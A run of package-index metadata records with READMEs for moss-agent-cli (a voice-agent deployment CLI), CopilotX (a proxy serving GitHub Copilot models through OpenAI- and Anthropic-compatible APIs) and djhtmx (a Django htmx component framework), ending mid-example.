"huggingface_hub-1.4.0",
"requests>=2.31.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-django>=4.5.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"flake8>=6.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/hitenjoshi/django-ai-chatbot",
"Repository, https://github.com/hitenjoshi/django-ai-chatbot",
"Issues, https://github.com/hitenjoshi/django-ai-chatbot/issues"
] | twine/6.2.0 CPython/3.11.9 | 2026-02-20T09:23:35.122283 | django_ai_chatbot-0.1.0.tar.gz | 7,033 | 18/13/cebc22ad641f925a57c8f373b564514b40741a4e12b46d9ce8baa2efa49d/django_ai_chatbot-0.1.0.tar.gz | source | sdist | null | false | 1a4b1f5919b885267518a5ec902900ae | 8c776982309a20f82575f1e6a8a4850ef2ab0849d89346d87687325361f7c3a3 | 1813cebc22ad641f925a57c8f373b564514b40741a4e12b46d9ce8baa2efa49d | null | [
"LICENSE"
] | 241 |
2.4 | moss-agent-cli | 0.2.2 | CLI tool for deploying Moss voice agents | # Moss Agent CLI
Command-line tool for deploying voice agents to the Moss platform.
## Installation
```bash
pip install moss-agent-cli
```
Or install from source:
```bash
cd moss-agent-cli
pip install -e .
```
## Usage
### Deploy Command
Deploy your agent to the Moss platform:
```bash
moss-agent deploy
```
### Required Environment Variables
Set these environment variables or pass as CLI options:
```bash
export MOSS_PROJECT_ID="your-project-id"
export MOSS_PROJECT_KEY="your-project-key"
export MOSS_VOICE_AGENT_ID="your-voice-agent-id"
```
Or pass as options:
```bash
moss-agent deploy \
--project-id "your-project-id" \
--project-key "your-project-key" \
--voice-agent-id "your-voice-agent-id"
```
### Agent Structure
Your agent directory must contain an entry point file that imports from `moss_voice_agent_manager`:
**Simple structure:**
```
my-agent/
├── agent.py # Entry point (uses MossAgentSession)
├── requirements.txt # Optional: Additional dependencies
└── tools/ # Optional: Custom tools
└── my_tools.py
```
**Or with main.py:**
```
my-agent/
├── main.py # Entry point
├── requirements.txt
└── ...
```
**Or with src structure:**
```
my-agent/
├── src/
│ └── my_agent/
│ └── main.py # Entry point
├── requirements.txt
└── ...
```
#### Example agent.py
```python
from moss_voice_agent_manager import MossAgentSession
def get_weather(city: str) -> str:
    """Get weather for a city."""
    return f"Weather in {city} is sunny"

session = MossAgentSession(
    function_tools=[get_weather],
    max_tool_steps=10,
)

if __name__ == "__main__":
    session.run()
```
## CLI Options
```
moss-agent deploy [OPTIONS] [DIRECTORY]
Arguments:
DIRECTORY Agent directory to deploy (defaults to current directory)
Options:
--project-id, -p TEXT Moss project ID (or set MOSS_PROJECT_ID env var)
--project-key, -k TEXT Moss project key (or set MOSS_PROJECT_KEY env var)
--voice-agent-id, -v TEXT Voice agent ID (or set MOSS_VOICE_AGENT_ID env var)
--api-url TEXT Moss platform API URL (defaults to production)
--help Show this message and exit
```
## What Gets Deployed
When you run `moss-agent deploy`, the CLI:
1. **Validates** your agent structure
2. **Packages** your agent directory (excluding .env, __pycache__, .git, etc.)
3. **Uploads** the package to Moss platform
4. **Deploys** to LiveKit Cloud
Your agent code is deployed as-is - no modification or generation.
## Excluded Files
The following files/directories are automatically excluded from deployment:
- `.env` - Environment variables (secrets)
- `__pycache__/` - Python cache
- `.git/` - Git repository
- `*.pyc` - Compiled Python files
- `.venv/`, `venv/` - Virtual environments
- `.DS_Store` - macOS metadata
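The exclusion logic can be sketched with the standard library. The `package_agent` helper below is hypothetical; the CLI's real packaging code may differ:

```python
import fnmatch
import os
import zipfile

EXCLUDE = [".env", "__pycache__", ".git", "*.pyc", ".venv", "venv", ".DS_Store"]

def excluded(relpath):
    """True if any path component matches an exclusion pattern."""
    return any(
        fnmatch.fnmatch(part, pattern)
        for part in relpath.split(os.sep)
        for pattern in EXCLUDE
    )

def package_agent(directory, archive_path):
    """Zip an agent directory, skipping excluded files and directories."""
    with zipfile.ZipFile(archive_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for root, dirs, files in os.walk(directory):
            dirs[:] = [d for d in dirs if not excluded(d)]  # prune walk in place
            for name in files:
                rel = os.path.relpath(os.path.join(root, name), directory)
                if not excluded(rel):
                    zf.write(os.path.join(root, name), rel)
    return archive_path
```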
## Development
Install in development mode:
```bash
cd moss-agent-cli
pip install -e .
```
Run the CLI:
```bash
moss-agent deploy
```
## License
MIT
| text/markdown | null | Moss Team <support@moss.dev> | null | null | MIT | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"typer>=0.9.0",
"rich>=13.0.0",
"httpx>=0.27.0",
"python-dotenv>=1.0.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T09:22:31.534536 | moss_agent_cli-0.2.2.tar.gz | 7,980 | 63/c2/7894760d17c1daee23624d5f2c9a47723eb8b56644c4806153f543449f7d/moss_agent_cli-0.2.2.tar.gz | source | sdist | null | false | 0ac0fe35e7e5ece0e11cb7c34daa986c | cc4ed7e86d88f6dfcf60a6070908efafd081a6d2cebeaa21a0710830cd0f745a | 63c27894760d17c1daee23624d5f2c9a47723eb8b56644c4806153f543449f7d | null | [] | 216 |
2.4 | copilotx | 2.3.3 | Local GitHub Copilot API proxy — use GPT-4o, Claude, Gemini via OpenAI/Anthropic compatible APIs | # 🚀 CopilotX
Local & Remote GitHub Copilot API proxy — use GPT-4o, Claude, Gemini and more via OpenAI/Anthropic compatible APIs.
Turn your GitHub Copilot subscription into an AI API server. Use **any model** available through Copilot with **any tool** that supports OpenAI or Anthropic SDKs — locally or on a remote VM.
## ✨ Features
- 🔐 **GitHub OAuth** — One-command login via Device Flow, or use existing token
- 🔄 **Auto Token Refresh** — Copilot JWT refreshed transparently before expiry
- 🔌 **Triple API Format** — OpenAI `/v1/chat/completions` + `/v1/responses` + Anthropic `/v1/messages`
- 🌊 **SSE Streaming** — Real-time streaming responses for all formats
- 👁️ **Vision Support** — Pass images through Responses API (auto-detected)
- 🎯 **Dynamic API URL** — Auto-discovers correct Copilot API endpoint per account type
- 📋 **Model Discovery** — Auto-fetch available models from Copilot
- ⚡ **Zero Config** — `pip install` → `auth login` → `serve` → done
- 🌐 **Remote Deploy** — Serve on `0.0.0.0` with API key protection, deploy behind Caddy for auto-HTTPS
## 🚀 Quick Start
### 1. Install
```bash
pip install copilotx
# or
uv pip install copilotx
```
### 2. Authenticate
```bash
# Option A: OAuth Device Flow (recommended)
copilotx auth login
# → Opens browser for GitHub authorization
# Option B: Use existing GitHub token
copilotx auth login --token ghp_xxxxx
# or
export GITHUB_TOKEN=ghp_xxxxx && copilotx auth login
```
### 3. Start Server
```bash
copilotx serve
```
Output:
```
🚀 CopilotX v2.3.3
✅ Copilot Token valid (28m remaining, auto-refresh)
🔒 Local mode (localhost only)
🎯 API: api.enterprise.githubcopilot.com (auto-detected)
📋 Models: claude-opus-4.6, gpt-5-mini, gpt-5, gemini-2.5-pro, ...
📁 Port info: ~/.copilotx/server.json
🔗 OpenAI Chat: http://127.0.0.1:24680/v1/chat/completions
🔗 Responses: http://127.0.0.1:24680/v1/responses
🔗 Anthropic API: http://127.0.0.1:24680/v1/messages
🔗 Models: http://127.0.0.1:24680/v1/models
Press Ctrl+C to stop
```
### 4. Use It
**Python (OpenAI SDK):**
```python
from openai import OpenAI
client = OpenAI(base_url="http://localhost:24680/v1", api_key="copilotx")
response = client.chat.completions.create(
model="gpt-4o",
messages=[{"role": "user", "content": "Hello!"}],
stream=True,
)
for chunk in response:
    print(chunk.choices[0].delta.content or "", end="")
```
**Python (Anthropic SDK):**
```python
from anthropic import Anthropic
client = Anthropic(base_url="http://localhost:24680", api_key="copilotx")
message = client.messages.create(
model="claude-sonnet-4",
max_tokens=1024,
messages=[{"role": "user", "content": "Hello!"}],
)
print(message.content[0].text)
```
**Claude Code:**
```bash
# Set environment variables
export ANTHROPIC_BASE_URL=http://localhost:24680
export ANTHROPIC_API_KEY=copilotx
claude
```
**Codex CLI (uses Responses API):**
```bash
export OPENAI_BASE_URL=http://localhost:24680/v1
export OPENAI_API_KEY=copilotx
codex
```
> Codex CLI uses the `/v1/responses` endpoint natively. CopilotX v2.1.0+ supports this
> including streaming, vision input, and `apply_patch` tool invocation.
**Python (OpenAI Responses API):**
```python
from openai import OpenAI
client = OpenAI(base_url="http://localhost:24680/v1", api_key="copilotx")
response = client.responses.create(
model="gpt-5-mini",
input="Explain quicksort in 3 sentences.",
)
print(response.output_text)
```
**cURL:**
```bash
curl http://localhost:24680/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "gpt-4o",
"messages": [{"role": "user", "content": "Hello!"}]
}'
```
## 📡 API Endpoints
| Endpoint | Method | Description |
|----------|--------|-------------|
| `/v1/chat/completions` | POST | OpenAI-compatible chat completions |
| `/v1/responses` | POST | OpenAI Responses API (streaming, vision, tools) |
| `/v1/messages` | POST | Anthropic-compatible messages |
| `/v1/models` | GET | List available models |
| `/health` | GET | Server health + token status |
## 🔧 CLI Commands
```bash
copilotx auth login # OAuth Device Flow login
copilotx auth login --token XXX # Quick login with existing token
copilotx auth status # Show auth status
copilotx auth logout # Clear credentials
copilotx models # List available models
copilotx serve # Start server (default: 127.0.0.1:24680)
copilotx serve --host 0.0.0.0 # Remote mode (bind all interfaces)
copilotx serve --port 9090 # Custom port (strict — fails if in use)
copilotx config claude-code # Configure for local CopilotX
copilotx config claude-code -u https://... # Configure for remote server
copilotx --version # Show version
```
### Client Configuration
The `config` command auto-generates Claude Code configuration with smart defaults:
```bash
# Local mode — one command, zero prompts
copilotx config claude-code
# → Uses localhost:24680, auto-selects best models
# Remote mode — auto-reads API key from ~/.copilotx/.env
copilotx config claude-code -u https://api.polly.wang
# Custom models (optional)
copilotx config claude-code -m claude-opus-4.6 -s gpt-5-mini
```
Creates `~/.claude/settings.json` using `ANTHROPIC_AUTH_TOKEN` (bypasses Claude Code's API key format validation).
## 🏗️ How It Works
```
Your Tool (Claude Code / Codex / Python script)
│
│ OpenAI Chat / Responses / Anthropic format
▼
┌───────────────────────────────────┐
│ CopilotX (localhost:24680) │
│ │
│ • /v1/chat/completions (pass) │
│ • /v1/responses (pass + fix IDs) │
│ • /v1/messages (Anthropic→OpenAI)│
│ • Vision auto-detection │
│ • apply_patch tool patching │
│ • Token auto-refresh │
└───────────────┬───────────────────┘
│ OpenAI format
▼
api.{individual|enterprise}.githubcopilot.com
├── /chat/completions
└── /responses
(GPT-5, Claude Opus 4.6, Gemini 2.5, ...)
```
CopilotX uses your GitHub Copilot subscription to access models. The correct API endpoint
is **auto-detected** from the Copilot token (`endpoints.api` field) — no hardcoded URLs.
OpenAI requests are **direct passthrough**, Anthropic requests are translated on-the-fly,
and Responses API streams get **ID synchronization** for consistent event tracking.
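The endpoint selection described above can be sketched as follows — a minimal illustration, not CopilotX's actual code, assuming the Copilot token exchange returns a JSON object carrying an `endpoints.api` field as the diagram suggests:

```python
def resolve_api_base(token_payload: dict) -> str:
    """Pick the Copilot API base URL from a token-exchange payload.

    Sketch only: reads the ``endpoints.api`` field when present and falls
    back to the individual-account endpoint otherwise.
    """
    endpoints = token_payload.get("endpoints") or {}
    api = endpoints.get("api") or "https://api.individual.githubcopilot.com"
    return api.rstrip("/")


# An enterprise account's payload would yield the enterprise endpoint:
payload = {"endpoints": {"api": "https://api.enterprise.githubcopilot.com/"}}
print(resolve_api_base(payload))  # → https://api.enterprise.githubcopilot.com
```

Because the URL comes from the token itself, the same binary works unchanged for individual, business, and enterprise accounts.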
## 🔍 Port Discovery
When CopilotX starts, it writes `~/.copilotx/server.json`:
```json
{
"host": "127.0.0.1",
"port": 24680,
"pid": 12345,
"started_at": "2026-02-09T12:00:00+00:00",
"base_url": "http://127.0.0.1:24680"
}
```
Other scripts can read this to discover the actual port:
```bash
# Bash/Zsh
PORT=$(python -c "import json; print(json.load(open('$HOME/.copilotx/server.json'))['port'])")
curl http://localhost:$PORT/health
# PowerShell
$info = Get-Content "$HOME\.copilotx\server.json" | ConvertFrom-Json
curl http://localhost:$($info.port)/health
```
The file is automatically cleaned up when the server stops.
## 🌐 Remote Deployment
Deploy CopilotX on a cloud VM to access your Copilot models from anywhere.
### Quick Setup (Azure VM / any Linux server)
```bash
# 1. Install
pip install copilotx
# 2. Authenticate
copilotx auth login
# 3. Set API key for remote protection
export COPILOTX_API_KEY=$(openssl rand -hex 32)
echo "Save this key: $COPILOTX_API_KEY"
# 4. Start in remote mode
copilotx serve --host 0.0.0.0
```
### Production Setup with Nginx + systemd
For production deployments with HTTPS, we recommend using Nginx as the reverse proxy.
**1. Install and configure systemd service:**
```bash
# Copy and customize the systemd service template
sudo cp deploy/copilotx.service /etc/systemd/system/
# Create environment file with your API key
mkdir -p ~/.copilotx
echo "COPILOTX_API_KEY=$(openssl rand -hex 32)" > ~/.copilotx/.env
# Enable and start service
sudo systemctl daemon-reload
sudo systemctl enable --now copilotx
```
**2. Configure Nginx reverse proxy:**
```bash
# Copy the Nginx config template
sudo cp deploy/nginx-copilotx.conf /etc/nginx/sites-available/copilotx
sudo ln -s /etc/nginx/sites-available/copilotx /etc/nginx/sites-enabled/
# Get SSL certificate with Let's Encrypt
sudo certbot --nginx -d your-domain.com
# Reload Nginx
sudo nginx -t && sudo systemctl reload nginx
```
The `deploy/` directory includes ready-to-use templates:
- `copilotx.service` — systemd service unit (generic)
- `copilotx-azureuser.service` — systemd service unit (Azure VM with virtualenv)
- `nginx-copilotx.conf` — Nginx reverse proxy with SSL, rate limiting, and SSE support
- `nginx-copilotx-http.conf` — Temporary HTTP-only config for initial Let's Encrypt setup
- `Caddyfile` — Alternative Caddy config (simpler setup with auto-HTTPS)
- `.env.example` — Environment variables template
### Security Model
| Mode | Host | API Key | Behavior |
|------|------|---------|----------|
| **Local** | `127.0.0.1` (default) | Not needed | Fully open, localhost only |
| **Remote (protected)** | `0.0.0.0` | `COPILOTX_API_KEY` set | Localhost exempt, remote needs Bearer token |
| **Remote (open)** | `0.0.0.0` | Not set | ⚠️ Warning shown, fully open |
**Accessing from remote:**
```bash
# Use Bearer token
curl https://your-domain.com/v1/models \
-H "Authorization: Bearer YOUR_API_KEY"
# Or x-api-key header
curl https://your-domain.com/v1/models \
-H "x-api-key: YOUR_API_KEY"
```
**With OpenAI SDK:**
```python
client = OpenAI(
base_url="https://your-domain.com/v1",
api_key="YOUR_COPILOTX_API_KEY",
)
```
## 📋 Version Roadmap
| Version | Codename | Features |
|---------|----------|----------|
| v1.0.0 | Local | OAuth, dual API, streaming, model discovery |
| v2.0.0 | Remote | API key auth, remote deploy, Nginx/Caddy + systemd templates |
| v2.1.0 | Codex | Responses API, vision support, dynamic API URL, stream ID sync |
| v2.2.0 | Config | `copilotx config` command for client setup (Claude Code) |
| **v2.3.x** | **Polish** | **Error passthrough, stream error handling, test suite** |
| v3.0.0 | Multi-User | Token pool, user database, OpenRouter mode |
## ⚠️ Disclaimer
This tool is for **personal local use only**. Please comply with
[GitHub Copilot Terms of Service](https://docs.github.com/en/copilot/overview-of-github-copilot/about-github-copilot-individual).
The author is not responsible for any account restrictions resulting from misuse.
## 📄 License
MIT
# djhtmx
[](https://github.com/edelvalle/djhtmx/actions/workflows/ci.yml)
Interactive UI Components for Django using [htmx](https://htmx.org)
## Install
```bash
uv add djhtmx
```
or
```bash
pip install djhtmx
```
# Configuration
## Requirements
djhtmx requires **Redis** to be running for session storage and component state management.
**Important**: Redis is not included with djhtmx and must be installed separately on your system. Make sure Redis is installed and accessible before using djhtmx.
### Installing Redis
- **macOS**: `brew install redis`
- **Ubuntu/Debian**: `sudo apt-get install redis-server`
- **CentOS/RHEL**: `sudo yum install redis` or `sudo dnf install redis`
- **Docker**: `docker run -d -p 6379:6379 redis:alpine`
- **Windows**: Download from [Redis for Windows](https://github.com/microsoftarchive/redis/releases)
Add `djhtmx` to your `INSTALLED_APPS`.
```python
INSTALLED_APPS = [
...
"djhtmx",
...
]
```
Add the middleware as the last entry in the list:
```python
MIDDLEWARE = [
...,
"djhtmx.middleware",
]
```
Add `djhtmx.context.component_repo` to the list of context processors:
```python
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
...,
"djhtmx.context.component_repo",
],
},
},
]
```
Expose the HTTP endpoint in your `urls.py`; you can use any path you want.
```python
from django.urls import path, include
urlpatterns = [
# ...
path("_htmx/", include("djhtmx.urls")),
# ...
]
```
## Settings
djhtmx can be configured through Django settings:
### Required Settings
- **`DJHTMX_REDIS_URL`** (default: `"redis://localhost/0"`): Redis connection URL for session storage and component state management.
### Optional Settings
- **`DJHTMX_SESSION_TTL`** (default: `3600`): Session timeout in seconds. Can be an integer or a `datetime.timedelta` object.
- **`DJHTMX_DEFAULT_LAZY_TEMPLATE`** (default: `"htmx/lazy.html"`): Default template for lazy-loaded components.
- **`DJHTMX_ENABLE_SENTRY_TRACING`** (default: `True`): Enable Sentry tracing integration.
- **`DJHTMX_ENABLE_LOGFIRE_TRACING`** (default: `False`): Enable Logfire tracing integration.
- **`DJHTMX_STRICT_EVENT_HANDLER_CONSISTENCY_CHECK`** (default: `False`): Enable strict consistency checking for event handlers.
- **`DJHTMX_KEY_SIZE_ERROR_THRESHOLD`** (default: `0`): Threshold in bytes for session key size errors (0 = disabled).
- **`DJHTMX_KEY_SIZE_WARN_THRESHOLD`** (default: `51200`): Threshold in bytes for session key size warnings (50KB).
- **`DJHTMX_KEY_SIZE_SAMPLE_PROB`** (default: `0.1`): Probability for sampling session key size checks.
### Example Configuration
```python
# settings.py
# Redis connection (required)
DJHTMX_REDIS_URL = "redis://localhost:6379/0" # or redis://user:password@host:port/db
# Optional settings
DJHTMX_SESSION_TTL = 7200 # 2 hours
DJHTMX_DEFAULT_LAZY_TEMPLATE = "my_app/lazy_component.html"
DJHTMX_ENABLE_SENTRY_TRACING = True
DJHTMX_KEY_SIZE_WARN_THRESHOLD = 100 * 1024 # 100KB
```
In your base template you need to load the necessary scripts to make this work
```html
{% load htmx %}
<!doctype html>
<html>
<head>
{% htmx-headers %}
</head>
</html>
```
## Getting started
**Important**: djhtmx is a framework for building interactive components, not a component library. No pre-built components, templates, or behaviors are provided. You need to create your own components from scratch using the framework's base classes and conventions.
This library is opinionated about how to use HTMX with Django, but it is not opinionated about components, styling, or specific functionality. You have complete freedom to design and implement your components as needed for your application.
This app looks for `htmx.py` files in your apps and registers all components found there; manually loading any module containing components when Django boots up also works.
### Component Organization
As of version 1.2.0, djhtmx supports both single file and directory-based component organization:
**Single file (traditional):**
```
myapp/
├── htmx.py # All components in one file
└── ...
```
**Directory structure (new in v1.2.0):**
```
myapp/
├── htmx/
│ ├── __init__.py
│ ├── components.py # Basic components
│ ├── forms.py # Form components
│ └── widgets/
│ ├── __init__.py
│ ├── calendar.py # Calendar widgets
│ └── charts.py # Chart widgets
└── ...
```
The autodiscovery system will recursively find and import all Python modules under `htmx/` directories, allowing you to organize your components in a structured way that scales with your project size.
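The recursive discovery described above can be approximated with the standard library. This is a sketch of the general technique, not djhtmx's actual implementation:

```python
import importlib
import pkgutil


def import_submodules(package_name: str) -> list[str]:
    """Import a package and every module nested under it, recursively.

    Importing a module is enough for registration schemes that hook into
    class creation (e.g. via __init_subclass__ or a metaclass).
    """
    package = importlib.import_module(package_name)
    imported = [package_name]
    for info in pkgutil.walk_packages(package.__path__, prefix=package_name + "."):
        importlib.import_module(info.name)
        imported.append(info.name)
    return imported
```

Given the directory layout shown above, calling `import_submodules("myapp.htmx")` would import `components`, `forms`, and everything under `widgets/`.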
```python
from djhtmx.component import HtmxComponent
class Counter(HtmxComponent):
_template_name = "Counter.html"
counter: int = 0
def inc(self, amount: int = 1):
self.counter += amount
```
The `inc` event handler is ready to be called from the front-end to respond to an event.
The `Counter.html` template would be:
```html
{% load htmx %}
<div {% hx-tag %}>
{{ counter }}
<button {% on "inc" %}>+</button>
<button {% on "inc" amount=2 %}>+2</button>
</div>
```
When the event is dispatched to the back-end, the component state is reconstructed, the event handler is called, and then the full component is rendered back to the front-end.
Now use the component in any of your html templates, by passing attributes that are part of the component state:
```html
{% load htmx %}
Counters: <br />
{% htmx "Counter" %} Counter with init value 3:<br />
{% htmx "Counter" counter=3 %}
```
## Doing more complicated stuff
### Authentication
All components have a `self.user` representing the currently logged-in user, or `None` if the user is anonymous. If you want to make sure the user is properly validated and enforced, create a base component and annotate the right user type:
```python
from typing import Annotated
from pydantic import Field
from djhtmx.component import HtmxComponent
class BaseComponent(HtmxComponent, public=False):
user: Annotated[User, Field(exclude=True)]
class Counter(BaseComponent):
_template_name = "Counter.html"
counter: int = 0
def inc(self, amount: int = 1):
self.counter += amount
```
### Non-public components
These are components that can't be instantiated using `{% htmx "ComponentName" %}` because they are used to create some abstraction and reuse code.
Pass `public=False` in their declaration
```python
class BaseComponent(HtmxComponent, public=False):
...
```
### Model Loading Optimization
Components can optimize database queries when loading Django models:
```python
from typing import Annotated
from djhtmx.introspection import ModelConfig
class TodoComponent(HtmxComponent):
# Basic: loads immediately when component is created
item: Item
# Optional: returns None if object doesn't exist (e.g., was deleted)
archived_item: Item | None = None
# Lazy: defers loading until accessed
user: Annotated[User, ModelConfig(lazy=True)]
# Optimized: use select_related for foreign keys, prefetch_related for reverse FKs/M2M
todo_list: Annotated[
TodoList,
ModelConfig(
lazy=True,
select_related=["owner", "category"],
prefetch_related=["items", "items__tags"]
)
]
```
**Handling Deleted Objects:**
Lazy models handle deleted database objects gracefully:
```python
class MyComponent(HtmxComponent):
# Required: raises ObjectDoesNotExist when checking if object was deleted
item: Annotated[Item, ModelConfig(lazy=True)]
# Optional: becomes falsy and returns None when object was deleted
archived_item: Annotated[Item | None, ModelConfig(lazy=True)]
```
- **Required lazy models**: Checking truthiness (`if component.item:`) raises `ObjectDoesNotExist` with a clear message
- **Optional lazy models**: Checking truthiness returns `False`, field accesses return `None`
- **Both**: Accessing `.pk` always works without triggering database queries
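The truthiness rules above can be illustrated with a tiny stand-in (plain Python, no Django; `ObjectDoesNotExist`, `LazyRef`, and `fetch` are illustrative names, not djhtmx's API):

```python
class ObjectDoesNotExist(Exception):
    """Stand-in for django.core.exceptions.ObjectDoesNotExist."""


class LazyRef:
    """Illustrates required vs optional lazy model semantics."""

    def __init__(self, fetch, required: bool):
        self._fetch = fetch          # callable returning the object or None
        self._required = required

    def __bool__(self):
        obj = self._fetch()
        if obj is None and self._required:
            # Required lazy model: truthiness check on a deleted row raises.
            raise ObjectDoesNotExist("referenced row was deleted")
        # Optional lazy model: a deleted row is simply falsy.
        return obj is not None
```

With `required=False` a deleted object makes the reference falsy; with `required=True` the same check raises `ObjectDoesNotExist`, matching the bullet points above.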
## Component nesting
Components can contain other components to decompose behavior into more granular and specialized parts. To do this, simply use a component inside the template of another component:
```python
class Items(HtmxComponent):
_template_name = "Items.html"
def items(self):
return Item.objects.all()
class ItemEntry(HtmxComponent):
...
item: Item
is_open: bool = False
...
```
`Items.html`:
```html
{% load htmx %}
<ul {% hx-tag %}>
{% for item in items %}
{% htmx "ItemEntry" item=item %}
{% endfor %}
</ul>
```
In this case, every time the parent component renders, all child components are re-rendered as well.
How can you preserve the state of child components, some of which already had `is_open = True`? State that is not passed directly during instantiation is retrieved from the session, but for that the component needs a consistent id. To achieve this, pass an `id` to the component.
`Items.html`:
```html
{% load htmx %}
<ul {% hx-tag %}>
{% for item in items %}
{% htmx "ItemEntry" id="item-"|add:item.id item=item %}
{% endfor %}
</ul>
```
## Lazy loading
If you want some component to load lazily, you pass `lazy=True` where it is being instantiated.
`Items.html`:
```html
{% load htmx %}
<ul {% hx-tag %}>
{% for item in items %}
{% htmx "ItemEntry" id="item-"|add:item.id item=item lazy=True %}
{% endfor %}
</ul>
```
This initializes the component, but instead of the template in `_template_name`, the template defined in `_template_name_lazy` is rendered (you can override this). When the component arrives at the front-end, it triggers an event to render itself.
## Implicit parameters
When sending an event to the back-end, you can sometimes pass parameters explicitly to the event handler; other times they come from inputs the user is typing into. The values of those inputs are passed implicitly if they have a `name="..."` attribute.
```python
class Component(HtmxComponent):
...
def create(self, name: str, is_active: bool = False):
Item.objects.create(name=name, is_active=is_active)
```
```html
{% load htmx %}
<form {% hx-tag %} {% on "submit" "create" %}>
<input type="text" name="name">
<input type="checkbox" name="is_active">
<button type="submit">Create!</button>
</form>
```
The parameters of any event handler are always converted by pydantic to the annotated types. It is recommended to annotate event handler parameters with the most restrictive types you can.
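The conversion step can be pictured like this — a simplified stdlib-only sketch of the idea (djhtmx delegates the real work to pydantic, which also handles nested models, defaults, and validation errors):

```python
import inspect


def coerce_kwargs(handler, raw: dict) -> dict:
    """Coerce incoming string form values to the handler's annotated types."""
    converted = {}
    for name, param in inspect.signature(handler).parameters.items():
        if name not in raw:
            continue
        value = raw[name]
        ann = param.annotation
        if ann is bool:
            # HTML checkboxes send e.g. "on"; presence means True.
            converted[name] = value not in (False, "", "false", "0", None)
        elif ann is not inspect.Parameter.empty and ann is not str:
            converted[name] = ann(value)
        else:
            converted[name] = value
    return converted


def create(name: str, amount: int = 1, is_active: bool = False): ...


print(coerce_kwargs(create, {"name": "milk", "amount": "2", "is_active": "on"}))
# → {'name': 'milk', 'amount': 2, 'is_active': True}
```

The narrower the annotation, the earlier a malformed request is rejected instead of reaching your handler's logic.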
### Data structures in implicit parameters
Suppose that you have a multiple choice list and you want to select multiple options, you can do this by suffixing the name with `[]` as in `choices[]`:
```python
class DeleteSelection(HtmxComponent):
@property
def items(self):
        return Item.objects.filter(owner=self.user)
def delete(self, selected: list[UUID] | None = None):
if selected:
self.items.filter(id__in=selected).delete()
```
```html
{% load htmx %}
<form {% hx-tag %} {% on "submit" "delete" %}>
<h1>Select items to be deleted</h1>
{% for item in items %}
<p>
<input
type="checkbox"
name="selected[]"
value="{{ item.id }}"
id="checkbox-{{ item.id }}"
/>
<label for="checkbox-{{ item.id }}">{{ item.name }}</label>
</p>
{% endfor %}
<p><button type="submit">Delete selected</button></p>
</form>
```
## Commands
Each event handler in a component can yield commands for the library to execute. These are useful for skipping the default component render, redirecting the user, removing the component from the front-end, updating other components, and rendering components with custom context.
### Redirects
Wanna redirect the user to some object url:
- If you have the url directly you can `yield Redirect(url)`.
- If you want Django to resolve the url automatically use: `yield Redirect.to(obj, *args, **kwargs)` as you would use `django.shortcuts.resolve_url`.
```python
from djhtmx.component import HtmxComponent, Redirect
class Component(HtmxComponent):
...
def create(self, name: str):
item = Item.objects.create(name=name)
yield Redirect.to(item)
```
If you want to open the url in a new tab, use the `Open` command (`yield Open(...)`), which has a syntax similar to `Redirect`.
### Remove the current component from the interface
Sometimes you want to remove the component when it responds to an event; for that, `yield Destroy(component_id)`. You can also use this to remove any other component if you know its id.
```python
from djhtmx.component import HtmxComponent, Destroy
class Notification(HtmxComponent):
...
def close(self):
yield Destroy(self.id)
```
### Skip renders
Sometimes, when reacting to a front-end event, it is handy to skip the default render of the current component. To achieve this:
```python
from djhtmx.component import HtmxComponent, SkipRender
class Component(HtmxComponent):
...
def do_something(self):
...
yield SkipRender(self)
```
### Partial Rendering
Sometimes you don't want a full component render, but a partial one, especially if the user is typing somewhere to filter items and you don't want to interfere with their typing or focus. Here is the technique:
```python
from djhtmx.component import HtmxComponent, Render
class SmartFilter(HtmxComponent):
_template_name = "SmartFilter.html"
query: str = ""
@property
def items(self):
items = Item.objects.all()
if self.query:
items = items.filter(name__icontains=self.query)
return items
def filter(self, query: str):
        self.query = query.strip()
yield Render(self, template="SmartFilter_list.html")
```
`SmartFilter.html`:
```html
{% load htmx %}
<div {% hx-tag %}>
<input type="text" name="query" value="{{ query }}">
{% include "SmartFilter_list.html" %}
</div>
```
`SmartFilter_list.html`:
```html
<ul {% oob "list" %}>
{% for item in items %}
<li><a href="{{ item.get_absolute_url }}">{{ item }}</a></li>
{% empty %}
<li>Nothing found!</li>
{% endfor %}
</ul>
```
- Split the component in multiple templates, the main one and the partial ones.
- For readability prefix the name of the partials with the name of the parent.
- The partials need a single root HTML Element with an id and the `{% oob %}` tag next to it.
- When you want to do the partial render, `yield Render(self, template=...)` with the name of the partial template; this automatically skips the default full render and renders the component with that partial template.
### Rendering with Custom Context
Sometimes you need to render a component with custom context data that differs from the component's state. The `Render` command supports an optional `context` parameter that allows you to override the component's context:
```python
from djhtmx.component import HtmxComponent, Render
class DataVisualization(HtmxComponent):
_template_name = "DataVisualization.html"
def show_filtered_data(self, filter_type: str):
# Get some custom data that's not part of component state
custom_data = self.get_filtered_data(filter_type)
# Render with custom context
yield Render(
self,
template="DataVisualization_filtered.html",
context={
"filtered_data": custom_data,
"filter_applied": filter_type,
"timestamp": datetime.now()
}
)
```
When using custom context:
- The provided context overrides the component's default context
- Essential HTMX variables (`htmx_repo`, `hx_oob`, `this`) are preserved
- The component's state remains unchanged - only the rendering context is modified
- This is particularly useful for displaying computed data, temporary states, or external data that shouldn't be part of the component's persistent state
## Query Parameters & State
Coming back to the previous example, let's say we want to persist the `query` state in the URL, so that if the user refreshes the page or shares the link, the component state is partially restored. To do this:
```python
from typing import Annotated
from djhtmx.component import HtmxComponent
from djhtmx.query import Query
class SmartFilter(HtmxComponent):
...
query: Annotated[str, Query("query")] = ""
...
```
Annotating with `Query` means that if the value is not explicitly passed to the component during instantiation, it is taken from the query string of the current URL.
There can be multiple components subscribed to the same query parameter or to individual ones.
If you want now you can split this component in two, each with their own template:
```python
from typing import Annotated
from djhtmx.component import HtmxComponent, SkipRender
from djhtmx.query import Query
class SmartFilter(HtmxComponent):
_template_name = "SmartFilter.html"
query: Annotated[str, Query("query")] = ""
def filter(self, query: str):
        self.query = query.strip()
yield SkipRender(self)
class SmartList(HtmxComponent):
_template_name = "SmartList.html"
query: Annotated[str, Query("query")] = ""
@property
def items(self):
items = Item.objects.all()
if self.query:
